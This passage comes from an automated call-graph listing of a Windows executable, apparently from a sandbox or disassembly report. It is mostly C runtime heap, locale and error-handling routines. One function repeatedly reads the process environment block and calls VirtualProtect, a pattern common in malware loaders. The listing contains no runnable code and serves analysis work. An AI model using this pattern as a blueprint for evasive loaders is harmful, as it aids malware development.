1fe38b ___free_lconv_mon 14 API calls 13518 1fd48e 13517->13518 13518->13501 13520 1fdfad 13519->13520 13836 1fde0f 13520->13836 13523 1fdfc6 13523->13438 13526 1fdfdf 13528 1fe38b ___free_lconv_mon 14 API calls 13526->13528 13527 1fdfed 13850 1fdc0a 13527->13850 13528->13523 13531 1fe025 13533 1feb3e __dosmaperr 14 API calls 13531->13533 13532 1fe040 13536 1fe06c 13532->13536 13539 1fe38b ___free_lconv_mon 14 API calls 13532->13539 13534 1fe02a 13533->13534 13535 1fe38b ___free_lconv_mon 14 API calls 13534->13535 13535->13523 13537 1fe0b5 13536->13537 13861 1fe33e 13536->13861 13538 1fe38b ___free_lconv_mon 14 API calls 13537->13538 13538->13523 13539->13536 13574 1fd1d5 13541->13574 13544 1fcfa7 TlsGetValue 13545 1fcf95 13545->13495 13547 1fd1d5 __dosmaperr 5 API calls 13546->13547 13548 1fcfcb 13547->13548 13549 1fcfe9 TlsSetValue 13548->13549 13550 1fcfd4 13548->13550 13550->13497 13550->13498 13556 1febfb __dosmaperr 13551->13556 13552 1fec3b 13592 1feb3e 13552->13592 13553 1fec26 HeapAlloc 13554 1fd440 13553->13554 13553->13556 13554->13504 13554->13505 13556->13552 13556->13553 13589 1f9a41 13556->13589 13629 1fd7c2 13558->13629 13731 1fe47c 13563->13731 13566 1faba9 13568 1fabb3 IsProcessorFeaturePresent 13566->13568 13573 1fabd2 13566->13573 13569 1fabbf 13568->13569 13761 1fa5fa 13569->13761 13570 1f9725 __CreateFrameInfo 21 API calls 13572 1fabdc 13570->13572 13573->13570 13575 1fd205 13574->13575 13580 1fcf8c 13574->13580 13575->13580 13581 1fd10a 13575->13581 13578 1fd21f GetProcAddress 13579 1fd22f __dosmaperr 13578->13579 13578->13580 13579->13580 13580->13544 13580->13545 13587 1fd11b ___vcrt_InitializeCriticalSectionEx 13581->13587 13582 1fd1b1 13582->13578 13582->13580 13583 1fd139 LoadLibraryExW 13584 1fd1b8 13583->13584 13585 1fd154 GetLastError 13583->13585 13584->13582 13586 1fd1ca FreeLibrary 13584->13586 13585->13587 13586->13582 13587->13582 13587->13583 13588 1fd187 LoadLibraryExW 13587->13588 13588->13584 13588->13587 13595 1f9a7c 13589->13595 13606 1fd49b GetLastError 13592->13606 13594 1feb43 13594->13554 13596 1f9a88 ___scrt_is_nonwritable_in_current_image 13595->13596 13601 1fa8a1 EnterCriticalSection 13596->13601 13598 1f9a93 __CreateFrameInfo 13602 1f9aca 13598->13602 13601->13598 13605 1fa8b8 LeaveCriticalSection 13602->13605 13604 1f9a4c 13604->13556 13605->13604 13607 1fd4b7 13606->13607 13608 1fd4b1 13606->13608 13610 1fcfaf __dosmaperr 6 API calls 13607->13610 13612 1fd4bb SetLastError 13607->13612 13609 1fcf70 __dosmaperr 6 API calls 13608->13609 13609->13607 13611 1fd4d3 13610->13611 13611->13612 13614 1febee __dosmaperr 12 API calls 13611->13614 13612->13594 13615 1fd4e8 13614->13615 13616 1fd501 13615->13616 13617 1fd4f0 13615->13617 13618 1fcfaf __dosmaperr 6 API calls 13616->13618 13619 1fcfaf __dosmaperr 6 API calls 13617->13619 13620 1fd50d 13618->13620 13626 1fd4fe 13619->13626 13621 1fd528 13620->13621 13622 1fd511 13620->13622 13625 1fd65c __dosmaperr 12 API calls 13621->13625 13623 1fcfaf __dosmaperr 6 API calls 13622->13623 13623->13626 13624 1fe38b ___free_lconv_mon 12 API calls 13624->13612 13627 1fd533 13625->13627 13626->13624 13628 1fe38b ___free_lconv_mon 12 API calls 13627->13628 13628->13612 13630 1fd7ce ___scrt_is_nonwritable_in_current_image 13629->13630 13643 1fa8a1 EnterCriticalSection 13630->13643 13632 1fd7d8 13644 1fd808 13632->13644 13635 1fd814 13636 1fd820 ___scrt_is_nonwritable_in_current_image 13635->13636 13648 1fa8a1 EnterCriticalSection 13636->13648 13638 1fd82a 13649 1fd611 13638->13649 13640 1fd842 13653 1fd862 13640->13653 13643->13632 13647 1fa8b8 LeaveCriticalSection 13644->13647 13646 1fd6ca 13646->13635 13647->13646 13648->13638 13650 1fd647 __dosmaperr 13649->13650 13651 1fd620 __dosmaperr 13649->13651 13650->13640 13651->13650 13656 20051b 13651->13656 13730 1fa8b8 LeaveCriticalSection 13653->13730 13655 1fd487 13655->13517 13657 20059b 13656->13657 13661 200531 13656->13661 13658 2005e9 13657->13658 13660 1fe38b ___free_lconv_mon 14 API calls 13657->13660 13724 2006b5 13658->13724 13663 2005bd 13660->13663 13661->13657 13662 200564 13661->13662 13666 1fe38b ___free_lconv_mon 14 API calls 13661->13666 13664 200586 13662->13664 13671 1fe38b ___free_lconv_mon 14 API calls 13662->13671 13665 1fe38b ___free_lconv_mon 14 API calls 13663->13665 13668 1fe38b ___free_lconv_mon 14 API calls 13664->13668 13667 2005d0 13665->13667 13670 200559 13666->13670 13672 1fe38b ___free_lconv_mon 14 API calls 13667->13672 13673 200590 13668->13673 13669 200657 13675 1fe38b ___free_lconv_mon 14 API calls 13669->13675 13684 1fff90 13670->13684 13677 20057b 13671->13677 13678 2005de 13672->13678 13674 1fe38b ___free_lconv_mon 14 API calls 13673->13674 13674->13657 13679 20065d 13675->13679 13712 20008e 13677->13712 13682 1fe38b ___free_lconv_mon 14 API calls 13678->13682 13679->13650 13680 2005f7 13680->13669 13683 1fe38b 14 API calls ___free_lconv_mon 13680->13683 13682->13658 13683->13680 13685 1fffa1 13684->13685 13711 20008a 13684->13711 13686 1fffb2 13685->13686 13687 1fe38b ___free_lconv_mon 14 API calls 13685->13687 13688 1fffc4 13686->13688 13689 1fe38b ___free_lconv_mon 14 API calls 13686->13689 13687->13686 13690 1fffd6 13688->13690 13692 1fe38b ___free_lconv_mon 14 API calls 13688->13692 13689->13688 13691 1fffe8 13690->13691 13693 1fe38b ___free_lconv_mon 14 API calls 13690->13693 13694 1ffffa 13691->13694 13695 1fe38b ___free_lconv_mon 14 API calls 13691->13695 13692->13690 13693->13691 13696 20000c 13694->13696 13697 1fe38b ___free_lconv_mon 14 API calls 13694->13697 13695->13694 13698 20001e 13696->13698 13699 1fe38b ___free_lconv_mon 14 API calls 13696->13699 13697->13696 13700 1fe38b ___free_lconv_mon 14 API calls 13698->13700 13701 200030 13698->13701 13699->13698 13700->13701 13702 1fe38b ___free_lconv_mon 14 API calls 13701->13702 13704 200042 13701->13704 13702->13704 13703 200054 13706 200066 13703->13706 13708 1fe38b ___free_lconv_mon 14 API calls 13703->13708 13704->13703 13705 1fe38b ___free_lconv_mon 14 API calls 13704->13705 13705->13703 13707 200078 13706->13707 13709 1fe38b ___free_lconv_mon 14 API calls 13706->13709 13707->13711 13708->13706 13709->13707 13711->13662 13713 20009b 13712->13713 13723 2000f3 13712->13723 13714 2000ab 13713->13714 13715 1fe38b ___free_lconv_mon 14 API calls 13713->13715 13716 2000bd 13714->13716 13717 1fe38b ___free_lconv_mon 14 API calls 13714->13717 13715->13714 13718 2000cf 13716->13718 13719 1fe38b ___free_lconv_mon 14 API calls 13716->13719 13717->13716 13720 2000e1 13718->13720 13721 1fe38b ___free_lconv_mon 14 API calls 13718->13721 13719->13718 13722 1fe38b ___free_lconv_mon 14 API calls 13720->13722 13720->13723 13721->13720 13722->13723 13723->13664 13725 2006c2 13724->13725 13726 2006e1 13724->13726 13725->13726 13727 2000f7 __dosmaperr 14 API calls 13725->13727 13726->13680 13728 2006db 13727->13728 13729 1fe38b ___free_lconv_mon 14 API calls 13728->13729 13729->13726 13730->13655 13767 1fe6ff 13731->13767 13734 1fe4a3 13735 1fe4af ___scrt_is_nonwritable_in_current_image 13734->13735 13736 1fd49b __dosmaperr 14 API calls 13735->13736 13737 1fe4ff 13735->13737 13738 1fe511 __CreateFrameInfo 13735->13738 13743 1fe4e0 __CreateFrameInfo 13735->13743 13736->13743 13739 1feb3e __dosmaperr 14 API calls 13737->13739 13740 1fe547 __CreateFrameInfo 13738->13740 13781 1fa8a1 EnterCriticalSection 13738->13781 13741 1fe504 13739->13741 13746 1fe584 13740->13746 13747 1fe681 13740->13747 13757 1fe5b2 13740->13757 13778 1fa599 13741->13778 13743->13737 13743->13738 13760 1fe4e9 13743->13760 13746->13757 13782 1fd34a GetLastError 13746->13782 13748 1fe68c 13747->13748 13813 1fa8b8 LeaveCriticalSection 13747->13813 13751 1f9725 __CreateFrameInfo 21 API calls 13748->13751 13753 1fe694 13751->13753 13755 1fd34a _unexpected 39 API calls 13758 1fe607 13755->13758 13756 1fd34a _unexpected 39 API calls 13756->13757 13809 1fe62d 13757->13809 13759 1fd34a _unexpected 39 API calls 13758->13759 13758->13760 13759->13760 13760->13566 13762 1fa616 __fread_nolock __CreateFrameInfo 13761->13762 13763 1fa642 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13762->13763 13766 1fa713 __CreateFrameInfo 13763->13766 13765 1fa731 13765->13573 13828 1f4de3 13766->13828 13768 1fe70b ___scrt_is_nonwritable_in_current_image 13767->13768 13773 1fa8a1 EnterCriticalSection 13768->13773 13770 1fe719 13774 1fe75b 13770->13774 13773->13770 13777 1fa8b8 LeaveCriticalSection 13774->13777 13776 1fab9e 13776->13566 13776->13734 13777->13776 13814 1fa7e8 13778->13814 13780 1fa5a5 13780->13760 13781->13740 13783 1fd366 13782->13783 13784 1fd360 13782->13784 13785 1fcfaf __dosmaperr 6 API calls 13783->13785 13788 1fd36a SetLastError 13783->13788 13786 1fcf70 __dosmaperr 6 API calls 13784->13786 13787 1fd382 13785->13787 13786->13783 13787->13788 13790 1febee __dosmaperr 14 API calls 13787->13790 13792 1fd3ff 13788->13792 13793 1fd3fa 13788->13793 13791 1fd397 13790->13791 13794 1fd39f 13791->13794 13795 1fd3b0 13791->13795 13796 1fab99 CallUnexpected 37 API calls 13792->13796 13793->13756 13798 1fcfaf __dosmaperr 6 API calls 13794->13798 13799 1fcfaf __dosmaperr 6 API calls 13795->13799 13797 1fd404 13796->13797 13803 1fd3ad 13798->13803 13800 1fd3bc 13799->13800 13801 1fd3d7 13800->13801 13802 1fd3c0 13800->13802 13806 1fd65c __dosmaperr 14 API calls 13801->13806 13804 1fcfaf __dosmaperr 6 API calls 13802->13804 13805 1fe38b ___free_lconv_mon 14 API calls 13803->13805 13804->13803 13805->13788 13807 1fd3e2 13806->13807 13808 1fe38b ___free_lconv_mon 14 API calls 13807->13808 13808->13788 13810 1fe631 13809->13810 13812 1fe5f9 13809->13812 13827 1fa8b8 LeaveCriticalSection 13810->13827 13812->13755 13812->13758 13812->13760 13813->13748 13815 1fa7fa __fread_nolock 13814->13815 13818 1fa742 13815->13818 13817 1fa812 __fread_nolock 13817->13780 13819 1fa759 13818->13819 13820 1fa752 13818->13820 13822 1fa7bf __fread_nolock GetLastError SetLastError 13819->13822 13823 1fa767 13819->13823 13821 1f7c00 __fread_nolock 16 API calls 13820->13821 13821->13819 13824 1fa78e 13822->13824 13823->13817 13824->13823 13825 1fa5c6 std::_Throw_Cpp_error 11 API calls 13824->13825 13826 1fa7be 13825->13826 13827->13812 13829 1f4dec IsProcessorFeaturePresent 13828->13829 13830 1f4deb 13828->13830 13832 1f55dd 13829->13832 13830->13765 13835 1f56c2 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 13832->13835 13834 1f56c0 13834->13765 13835->13834 13869 1fdb88 13836->13869 13839 1fde42 13841 1fde59 13839->13841 13842 1fde47 GetACP 13839->13842 13840 1fde30 GetOEMCP 13840->13841 13841->13523 13843 1fed36 13841->13843 13842->13841 13844 1fed74 13843->13844 13848 1fed44 __dosmaperr 13843->13848 13845 1feb3e __dosmaperr 14 API calls 13844->13845 13847 1fdfd7 13845->13847 13846 1fed5f RtlAllocateHeap 13846->13847 13846->13848 13847->13526 13847->13527 13848->13844 13848->13846 13849 1f9a41 __dosmaperr 2 API calls 13848->13849 13849->13848 13851 1fde0f 41 API calls 13850->13851 13852 1fdc2a 13851->13852 13853 1fdd2f 13852->13853 13855 1fdc67 IsValidCodePage 13852->13855 13859 1fdc82 __fread_nolock 13852->13859 13854 1f4de3 CatchGuardHandler 5 API calls 13853->13854 13856 1fde0d 13854->13856 13855->13853 13857 1fdc79 13855->13857 13856->13531 13856->13532 13858 1fdca2 GetCPInfo 13857->13858 13857->13859 13858->13853 13858->13859 13909 1fe199 13859->13909 13862 1fe34a ___scrt_is_nonwritable_in_current_image 13861->13862 13989 1fa8a1 EnterCriticalSection 13862->13989 13864 1fe354 13990 1fe0d8 13864->13990 13870 1fdba6 13869->13870 13876 1fdb9f 13869->13876 13871 1fd34a _unexpected 39 API calls 13870->13871 13870->13876 13872 1fdbc7 13871->13872 13877 1ff056 13872->13877 13876->13839 13876->13840 13878 1fdbdd 13877->13878 13879 1ff069 13877->13879 13881 1ff083 13878->13881 13879->13878 13885 2006e6 13879->13885 13882 1ff0ab 13881->13882 13883 1ff096 13881->13883 13882->13876 13883->13882 13906 1fdb22 13883->13906 13886 2006f2 ___scrt_is_nonwritable_in_current_image 13885->13886 13887 1fd34a _unexpected 39 API calls 13886->13887 13888 2006fb 13887->13888 13889 200741 13888->13889 13898 1fa8a1 EnterCriticalSection 13888->13898 13889->13878 13891 200719 13899 200767 13891->13899 13896 1fab99 CallUnexpected 39 API calls 13897 200766 13896->13897 13898->13891 13900 200775 __dosmaperr 13899->13900 13902 20072a 13899->13902 13901 20051b __dosmaperr 14 API calls 13900->13901 13900->13902 13901->13902 13903 200746 13902->13903 13904 1fa8b8 __CreateFrameInfo LeaveCriticalSection 13903->13904 13905 20073d 13904->13905 13905->13889 13905->13896 13907 1fd34a _unexpected 39 API calls 13906->13907 13908 1fdb27 13907->13908 13908->13882 13910 1fe1c1 GetCPInfo 13909->13910 13919 1fe28a 13909->13919 13915 1fe1d9 13910->13915 13910->13919 13912 1f4de3 CatchGuardHandler 5 API calls 13914 1fe33c 13912->13914 13914->13853 13920 20025a 13915->13920 13918 203cc4 44 API calls 13918->13919 13919->13912 13921 1fdb88 __strnicoll 39 API calls 13920->13921 13922 20027a 13921->13922 13940 20035b 13922->13940 13924 200336 13926 1f4de3 CatchGuardHandler 5 API calls 13924->13926 13925 20032e 13943 20023a 13925->13943 13928 1fe241 13926->13928 13927 2002a7 13927->13924 13927->13925 13930 1fed36 __strnicoll 15 API calls 13927->13930 13931 2002cc __fread_nolock __strnicoll 13927->13931 13935 203cc4 13928->13935 13930->13931 13931->13925 13932 20035b __strnicoll MultiByteToWideChar 13931->13932 13933 200315 13932->13933 13933->13925 13934 20031c GetStringTypeW 13933->13934 13934->13925 13936 1fdb88 __strnicoll 39 API calls 13935->13936 13937 203cd7 13936->13937 13949 203d0d 13937->13949 13947 200385 13940->13947 13944 200246 13943->13944 13945 200257 13943->13945 13944->13945 13946 1fe38b ___free_lconv_mon 14 API calls 13944->13946 13945->13924 13946->13945 13948 200377 MultiByteToWideChar 13947->13948 13948->13927 13950 203d28 __strnicoll 13949->13950 13951 20035b __strnicoll MultiByteToWideChar 13950->13951 13953 203d6c 13951->13953 13952 1f4de3 CatchGuardHandler 5 API calls 13954 1fe262 13952->13954 13955 1fed36 __strnicoll 15 API calls 13953->13955 13957 203d92 __strnicoll 13953->13957 13958 203ee7 13953->13958 13969 203e3a 13953->13969 13954->13918 13955->13957 13956 20023a __freea 14 API calls 13956->13958 13959 20035b __strnicoll MultiByteToWideChar 13957->13959 13957->13969 13958->13952 13960 203ddb 13959->13960 13960->13969 13977 1fd03c 13960->13977 13969->13956 13978 1fd28e LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 13977->13978 13979 1fd047 13978->13979 13989->13864 14000 1fae38 13990->14000 13992 1fe0fa 13993 1fae38 __fread_nolock 29 API calls 13992->13993 13994 1fe119 13993->13994 13995 1fe140 13994->13995 13996 1fe38b ___free_lconv_mon 14 API calls 13994->13996 13997 1fe37f 13995->13997 13996->13995 14014 1fa8b8 LeaveCriticalSection 13997->14014 13999 1fe36d 13999->13537 14001 1fae49 14000->14001 14008 1fae45 CatchIt 14000->14008 14002 1fae50 14001->14002 14005 1fae63 __fread_nolock 14001->14005 14003 1feb3e __dosmaperr 14 API calls 14002->14003 14004 1fae55 14003->14004 14006 1fa599 __fread_nolock 29 API calls 14004->14006 14007 1fae91 14005->14007 14005->14008 14010 1fae9a 14005->14010 14006->14008 14009 1feb3e __dosmaperr 14 API calls 14007->14009 14008->13992 14011 1fae96 14009->14011 14010->14008 14012 1feb3e __dosmaperr 14 API calls 14010->14012 14013 1fa599 __fread_nolock 29 API calls 14011->14013 14012->14011 14013->14008 14014->13999 14016 1fcaa8 14015->14016 14017 1fca9a 14015->14017 14018 1feb3e __dosmaperr 14 API calls 14016->14018 14017->14016 14019 1fcac0 14017->14019 14023 1fcab0 14018->14023 14021 1fcaba 14019->14021 14022 1feb3e __dosmaperr 14 API calls 14019->14022 14020 1fa599 __fread_nolock 29 API calls 14020->14021 14021->13482 14022->14023 14023->14020 14025 1fa3aa 14024->14025 14026 1fa38d 14024->14026 14025->13483 14027 1fa3a4 14026->14027 14028 1fe38b ___free_lconv_mon 14 API calls 14026->14028 14029 1fe38b ___free_lconv_mon 14 API calls 14027->14029 14028->14026 14029->14025 14031 1fa5d2 14030->14031 14032 1fa5fa __CreateFrameInfo 8 API calls 14031->14032 14033 1fa5e7 GetCurrentProcess TerminateProcess 14032->14033 14033->13489 14035 20195d 14034->14035 14036 20196e 14035->14036 14039 201981 ___from_strstr_to_strchr 14035->14039 14037 1feb3e __dosmaperr 14 API calls 14036->14037 14047 201973 14037->14047 14038 201b98 14040 1feb3e __dosmaperr 14 API calls 14038->14040 14039->14038 14041 2019a1 14039->14041 14042 201b9d 14040->14042 14097 201bbd 14041->14097 14044 1fe38b ___free_lconv_mon 14 API calls 14042->14044 14044->14047 14045 2019e7 14052 1febee __dosmaperr 14 API calls 14045->14052 14083 2019d1 14045->14083 14047->13431 14048 2019e5 14048->14083 14101 201bd7 14048->14101 14049 2019c3 14056 2019e0 14049->14056 14057 2019cc 14049->14057 14054 2019f5 14052->14054 14053 1fe38b ___free_lconv_mon 14 API calls 14053->14047 14055 1fe38b ___free_lconv_mon 14 API calls 14054->14055 14059 201a00 14055->14059 14061 201bbd 39 API calls 14056->14061 14060 1feb3e __dosmaperr 14 API calls 14057->14060 14058 201a5a 14062 1fe38b ___free_lconv_mon 14 API calls 14058->14062 14059->14048 14065 1febee __dosmaperr 14 API calls 14059->14065 14059->14083 14060->14083 14061->14048 14068 201a62 14062->14068 14063 201aa5 14064 201712 32 API calls 14063->14064 14063->14083 14066 201ad3 14064->14066 14069 201a1c 14065->14069 14067 1fe38b ___free_lconv_mon 14 API calls 14066->14067 14074 201a8f 14067->14074 14068->14074 14105 201712 14068->14105 14073 1fe38b ___free_lconv_mon 14 API calls 14069->14073 14070 201b8d 14071 1fe38b ___free_lconv_mon 14 API calls 14070->14071 14071->14047 14073->14048 14074->14070 14074->14074 14077 1febee __dosmaperr 14 API calls 14074->14077 14074->14083 14075 201a86 14076 1fe38b ___free_lconv_mon 14 API calls 14075->14076 14076->14074 14078 201b1e 14077->14078 14079 201b26 14078->14079 14080 201b2e 14078->14080 14081 1fe38b ___free_lconv_mon 14 API calls 14079->14081 14082 1fca8c ___std_exception_copy 29 API calls 14080->14082 14081->14083 14084 201b3a 14082->14084 14083->14053 14085 201b41 14084->14085 14086 201bb2 14084->14086 14114 20774c 14085->14114 14088 1fa5c6 std::_Throw_Cpp_error 11 API calls 14086->14088 14090 201bbc 14088->14090 14091 201b87 14094 1fe38b ___free_lconv_mon 14 API calls 14091->14094 14092 201b68 14093 1feb3e __dosmaperr 14 API calls 14092->14093 14095 201b6d 14093->14095 14094->14070 14096 1fe38b ___free_lconv_mon 14 API calls 14095->14096 14096->14083 14098 2019ac 14097->14098 14099 201bca 14097->14099 14098->14045 14098->14048 14098->14049 14129 201c2c 14099->14129 14102 201a4a 14101->14102 14104 201bed 14101->14104 14102->14058 14102->14063 14104->14102 14144 20765b 14104->14144 14106 20173a 14105->14106 14107 20171f 14105->14107 14109 201749 14106->14109 14244 207488 14106->14244 14107->14106 14108 20172b 14107->14108 14110 1feb3e __dosmaperr 14 API calls 14108->14110 14251 2074bb 14109->14251 14113 201730 __fread_nolock 14110->14113 14113->14075 14263 2007e1 14114->14263 14118 207790 14119 2077bf 14118->14119 14120 2007e1 __wsopen_s 39 API calls 14118->14120 14121 2077cb 14119->14121 14124 1fe38b ___free_lconv_mon 14 API calls 14119->14124 14123 20779c 14120->14123 14122 201b62 14121->14122 14125 1fe38b ___free_lconv_mon 14 API calls 14121->14125 14122->14091 14122->14092 14126 200879 __wsopen_s 17 API calls 14123->14126 14124->14121 14125->14122 14127 2077a9 14126->14127 14127->14119 14128 2077b3 SetEnvironmentVariableW 14127->14128 14128->14119 14130 201c3a 14129->14130 14131 201c3f 14129->14131 14130->14098 14132 1febee __dosmaperr 14 API calls 14131->14132 14133 201c5c 14132->14133 14134 201cca 14133->14134 14137 201ccf 14133->14137 14140 1febee __dosmaperr 14 API calls 14133->14140 14141 1fe38b ___free_lconv_mon 14 API calls 14133->14141 14142 1fca8c ___std_exception_copy 29 API calls 14133->14142 14143 201cb9 14133->14143 14135 1fab99 CallUnexpected 39 API calls 14134->14135 14135->14137 14136 1fe38b ___free_lconv_mon 14 API calls 14136->14130 14138 1fa5c6 std::_Throw_Cpp_error 11 API calls 14137->14138 14139 201cdb 14138->14139 14140->14133 14141->14133 14142->14133 14143->14136 14145 207669 14144->14145 14146 20766f 14144->14146 14148 2077f0 14145->14148 14149 207838 14145->14149 14162 207684 14146->14162 14152 2077f6 14148->14152 14155 207813 14148->14155 14182 20784e 14149->14182 14154 1feb3e __dosmaperr 14 API calls 14152->14154 14153 207806 14153->14104 14156 2077fb 14154->14156 14158 1feb3e __dosmaperr 14 API calls 14155->14158 14161 207831 14155->14161 14157 1fa599 __fread_nolock 29 API calls 14156->14157 14157->14153 14159 207822 14158->14159 14160 1fa599 __fread_nolock 29 API calls 14159->14160 14160->14153 14161->14104 14163 1fdb88 __strnicoll 39 API calls 14162->14163 14164 20769a 14163->14164 14165 2076b6 14164->14165 14166 2076cd 14164->14166 14168 20767f 14164->14168 14167 1feb3e __dosmaperr 14 API calls 14165->14167 14170 2076d6 14166->14170 14171 2076e8 14166->14171 14169 2076bb 14167->14169 14168->14104 14174 1fa599 __fread_nolock 29 API calls 14169->14174 14175 1feb3e __dosmaperr 14 API calls 14170->14175 14172 2076f5 14171->14172 14173 207708 14171->14173 14177 20784e __strnicoll 39 API calls 14172->14177 14200 208e90 14173->14200 14174->14168 14176 2076db 14175->14176 14179 1fa599 __fread_nolock 29 API calls 14176->14179 14177->14168 14179->14168 14181 1feb3e __dosmaperr 14 API calls 14181->14168 14183 207878 14182->14183 14184 20785e 14182->14184 14186 207880 14183->14186 14187 207897 14183->14187 14185 1feb3e __dosmaperr 14 API calls 14184->14185 14188 207863 14185->14188 14189 1feb3e __dosmaperr 14 API calls 14186->14189 14190 2078a3 14187->14190 14191 2078ba 14187->14191 14192 1fa599 __fread_nolock 29 API calls 14188->14192 14193 207885 14189->14193 14194 1feb3e __dosmaperr 14 API calls 14190->14194 14195 1fdb88 __strnicoll 39 API calls 14191->14195 14199 20786e 14191->14199 14192->14199 14196 1fa599 __fread_nolock 29 API calls 14193->14196 14197 2078a8 14194->14197 14195->14199 14196->14199 14198 1fa599 __fread_nolock 29 API calls 14197->14198 14198->14199 14199->14153 14201 1fdb88 __strnicoll 39 API calls 14200->14201 14202 208ea3 14201->14202 14205 208ed6 14202->14205 14208 208f0a __strnicoll 14205->14208 14206 1f4de3 CatchGuardHandler 5 API calls 14207 20771e 14206->14207 14207->14168 14207->14181 14209 20916e 14208->14209 14211 208f77 GetCPInfo 14208->14211 14212 208f8a 14208->14212 14218 208f8e 14208->14218 14210 20035b __strnicoll MultiByteToWideChar 14213 209010 14210->14213 14211->14212 14211->14218 14212->14210 14212->14218 14214 209162 14213->14214 14216 1fed36 __strnicoll 15 API calls 14213->14216 14217 209037 __strnicoll 14213->14217 14213->14218 14215 20023a __freea 14 API calls 14214->14215 14215->14218 14216->14217 14217->14214 14219 20035b __strnicoll MultiByteToWideChar 14217->14219 14218->14206 14218->14209 14220 209083 14219->14220 14220->14214 14221 20035b __strnicoll MultiByteToWideChar 14220->14221 14222 20909f 14221->14222 14222->14214 14223 2090ad 14222->14223 14224 209110 14223->14224 14226 1fed36 __strnicoll 15 API calls 14223->14226 14229 2090c6 __strnicoll 14223->14229 14225 20023a __freea 14 API calls 14224->14225 14227 209116 14225->14227 14226->14229 14228 20023a __freea 14 API calls 14227->14228 14228->14218 14229->14224 14230 20035b __strnicoll MultiByteToWideChar 14229->14230 14231 209109 14230->14231 14231->14224 14232 209132 14231->14232 14238 1fce95 14232->14238 14235 20023a __freea 14 API calls 14236 209152 14235->14236 14237 20023a __freea 14 API calls 14236->14237 14237->14218 14239 1fd274 __strnicoll 5 API calls 14238->14239 14240 1fcea0 14239->14240 14241 1fd099 __strnicoll 5 API calls 14240->14241 14242 1fcea6 14240->14242 14243 1fcee6 CompareStringW 14241->14243 14242->14235 14243->14242 14245 207493 14244->14245 14246 2074a8 HeapSize 14244->14246 14247 1feb3e __dosmaperr 14 API calls 14245->14247 14246->14109 14248 207498 14247->14248 14249 1fa599 __fread_nolock 29 API calls 14248->14249 14250 2074a3 14249->14250 14250->14109 14252 2074d3 14251->14252 14253 2074c8 14251->14253 14255 2074db 14252->14255 14261 2074e4 __dosmaperr 14252->14261 14254 1fed36 __strnicoll 15 API calls 14253->14254 14260 2074d0 14254->14260 14258 1fe38b ___free_lconv_mon 14 API calls 14255->14258 14256 2074e9 14259 1feb3e __dosmaperr 14 API calls 14256->14259 14257 20750e HeapReAlloc 14257->14260 14257->14261 14258->14260 14259->14260 14260->14113 14261->14256 14261->14257 14262 1f9a41 __dosmaperr 2 API calls 14261->14262 14262->14261 14264 1fdb88 __strnicoll 39 API calls 14263->14264 14265 2007f3 14264->14265 14267 200805 14265->14267 14271 1fce76 14265->14271 14268 200879 14267->14268 14277 200a4f 14268->14277 14274 1fd25a 14271->14274 14275 1fd1d5 __dosmaperr 5 API calls 14274->14275 14276 1fce7e 14275->14276 14276->14267 14278 200a77 14277->14278 14279 200a5d 14277->14279 14280 200a9d 14278->14280 14281 200a7e 14278->14281 14295 20085f 14279->14295 14283 20035b __strnicoll MultiByteToWideChar 14280->14283 14294 200891 14281->14294 14299 200820 14281->14299 14285 200aac 14283->14285 14286 200ab3 GetLastError 14285->14286 14288 200ad9 14285->14288 14291 200820 __wsopen_s 15 API calls 14285->14291 14304 1feb64 14286->14304 14289 20035b __strnicoll MultiByteToWideChar 14288->14289 14288->14294 14292 200af0 14289->14292 14291->14288 14292->14286 14292->14294 14293 1feb3e __dosmaperr 14 API calls 14293->14294 14294->14118 14296 200872 14295->14296 14297 20086a 14295->14297 14296->14294 14298 1fe38b ___free_lconv_mon 14 API calls 14297->14298 14298->14296 14300 20085f __wsopen_s 14 API calls 14299->14300 14301 20082e 14300->14301 14309 2007c2 14301->14309 14312 1feb51 14304->14312 14306 1feb6f __dosmaperr 14307 1feb3e __dosmaperr 14 API calls 14306->14307 14308 1feb82 14307->14308 14308->14293 14310 1fed36 __strnicoll 15 API calls 14309->14310 14311 2007cf 14310->14311 14311->14294 14313 1fd49b __dosmaperr 14 API calls 14312->14313 14314 1feb56 14313->14314 14314->14306 14316 1c4e23 14315->14316 14365 1f7968 14316->14365 14318 1c4e3c 14319 1f4de3 CatchGuardHandler 5 API calls 14318->14319 14320 1c4e4c 14319->14320 14320->13283 14334 1d075f 14321->14334 14322 1d1d01 14322->13283 14323 1d1dcf VirtualProtect 14323->14334 14324 1cf3c0 31 API calls 14324->14334 14325 1d1d98 14332 1f4de3 CatchGuardHandler 5 API calls 14325->14332 14327 1d1553 GetPEB 14327->14334 14328 1d0cc6 GetPEB 14328->14334 14330 1d1529 GetPEB 14330->14334 14331 1d0b79 GetPEB 14331->14334 14333 1d343c 14332->14333 14333->13283 14334->14322 14334->14323 14334->14324 14334->14325 14334->14327 14334->14328 14334->14330 14334->14331 14831 1cf3c0 14334->14831 14336 1fb17a __fread_nolock 14335->14336 14915 1fb3e0 14336->14915 14338 1fb18f __fread_nolock 14338->13283 14340 1fb49d __fread_nolock 14339->14340 15021 1fba5f 14340->15021 14342 1fb4a9 __fread_nolock 14342->13283 15054 1faeb9 14343->15054 14350 1c5e8a 14346->14350 14348 1cd04d 14348->13283 14349 1ca379 14351 1f4de3 CatchGuardHandler 5 API calls 14349->14351 14350->14348 14350->14349 14352 1ca3b3 14350->14352 14353 1e55b0 31 API calls 14350->14353 15251 1e52e0 14350->15251 14354 1cf3a4 14351->14354 15237 1e55b0 14352->15237 14353->14350 14354->13283 14361 1d6fe6 _Deallocate 14356->14361 14357 1d9ef7 14357->13283 14358 1d701f 14359 1f4de3 CatchGuardHandler 5 API calls 14358->14359 14360 1d9f24 14359->14360 14360->13283 14361->14357 14361->14358 14362 1d7e5e 14361->14362 14363 1fa5a9 std::_Throw_Cpp_error 29 API calls 14362->14363 14364 1d9f31 14363->14364 14366 1f797c __fread_nolock 14365->14366 14367 1f799e 14366->14367 14369 1f79c5 14366->14369 14368 1fa742 __fread_nolock 29 API calls 14367->14368 14371 1f79b9 __fread_nolock 14368->14371 14372 1f911d 14369->14372 14371->14318 14373 1f9129 ___scrt_is_nonwritable_in_current_image 14372->14373 14380 1f774f EnterCriticalSection 14373->14380 14375 1f9137 14381 1f8af2 14375->14381 14380->14375 14395 1fea17 14381->14395 14383 1f8b19 14402 1f7f41 14383->14402 14390 1f4de3 CatchGuardHandler 5 API calls 14391 1f8b8c 14390->14391 14392 1f916c 14391->14392 14830 1f7763 